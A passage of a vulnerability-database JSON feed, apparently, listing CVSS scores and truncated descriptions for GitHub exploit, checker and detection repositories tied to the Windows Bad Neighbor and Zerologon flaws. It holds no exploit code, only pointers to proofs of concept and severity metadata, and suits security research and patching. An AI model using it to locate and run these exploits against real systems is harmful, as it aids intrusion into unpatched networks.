"3.1"}, "impactScore": 5.9}, "published": "2020-10-16T06:27:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-16T11:17:23", "id": "699EB52B-3630-500F-BA12-8F3B95E22A12", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-09T11:37:55", "description": "# CVE-2020-16898\n\nCVE-2020-16898 Windows TCP/IP\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e EXP&amp;...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T11:25:58", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-06-09T09:04:58", "id": "803A4C79-0547-5178-A113-233AC5D2498C", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:29", "description": "# CVE-2020-16898\nCVE-2020-16898 Windows TCP/IP\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e EXP&amp;P...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-20T05:24:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2021-10-10T21:13:40", "id": "60DC34D5-16D7-5E65-8C51-B36123C2EF39", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:36", "description": "================================================================...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T21:25:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-22T21:12:06", "id": "D7EB3EE2-A5C4-5CC7-B84F-D32CEB99D65A", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:31", "description": "# CVE-2020-16898_Checker\n Check all Network I...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-17T10:23:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-21T17:45:24", "id": "CD749811-2E16-5303-AD4B-1A0DDBCD78A4", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:09", "description": "# \"Bad Neighbor\" Detection, CVE-2020-16898 (Windows TCP/IP RCE) ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T03:25:00", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2021-10-24T07:13:26", "id": "08C67247-7D33-5943-A7AF-2E9C8989658E", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:26", "description": "# CVE-2020-16899: Microsoft Windows TCP/IP Denial of Service Vul...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-12T20:59:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16899", "CVE-2020-16898"], "modified": "2021-06-02T02:02:37", "id": "59F9AB6D-E4E2-5EEF-9F2E-2337B7C8D4B9", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:22", "description": "Zeek Package for Bad Neighbor Detection\n========================...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T16:38:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16899", "CVE-2020-16898"], "modified": "2020-10-15T15:39:52", "id": "F9B55BEE-32D1-5654-A978-E27E752E7163", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:36", "description": "# This is an educational exercise. Use at your own risk.\n\n# CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-14T14:42:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350", "CVE-2020-16898"], "modified": "2021-05-17T07:52:28", "id": "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:49", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:54:27", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T17:56:42", "id": "FC661572-B96B-5B2C-B12F-E8D279E189BF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-01T15:13:08", "description": "![Python][python-shield]\n\n# CVE-2020-1472\n\nCVE-2020-1472 - Zero ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T07:25:22", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-04-30T23:21:59", "id": "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:17:29", "description": "# zabbix-template-CVE-2020-1472\nZabbix Template to monitor...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T02:37:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-08T22:22:05", "id": "12E44744-1AF0-523A-ACA2-593B4D33E014", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:01:25", "description": "# Ladon Moudle CVE-2020-1472 Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T16:10:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-06-18T04:00:40", "id": "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:55", "description": "# CVE-2020-1472\nCVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T10:25:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-05-12T02:52:15", "id": "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:27:32", "description": "# cve-2020-1472\n\n@[toc](CATALOG)\n# \u6f0f\u6d1e\u539f\u7406\n\u539f\u7406\u6bd4\u8f83\u590d\u6742\uff0c\u6709\u5174\u8da3\u7684\u53ef\u4ee5\u770b\u770b\u4e0b\u9762\u94fe\u63a5\u4e0a\u7684\u6587\u7ae0h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-10T09:00:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-18T05:46:12", "id": "0CFAB531-412C-57A0-BD9E-EF072620C078", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T21:36:46", "description": "# Zerologon (CVE-2020-1472)\nThis script is made for bulk checkin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T18:45:44", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-15T19:52:37", "id": "49EC151F-12F0-59CF-960C-25BD54F46680", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:28:29", "description": "## A\u00e7\u0131klama\n\nZafiyetli \u015fifreleme protokol\u00fc, netlogon protokol\u00fcnd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T20:43:06", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-06T15:04:14", "id": "2255B39F-1B91-56F4-A323-8704808620D3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:16", "description": "# Set-ZerologonMitigation\nProtect your domain controllers agains...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T16:10:26", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-13T15:41:20", "id": "7078ED42-959E-5242-BE9D-17F2F99C76A8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:26", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T07:45:50", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-30T07:57:36", "id": "28D42B84-AB24-5FC6-ADE1-610374D67F21", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:26", "description": "# CVE-2020-1472\nCVE 2020-1472 Script de validaci\u00f3n \n\nAssumption:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-24T20:05:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 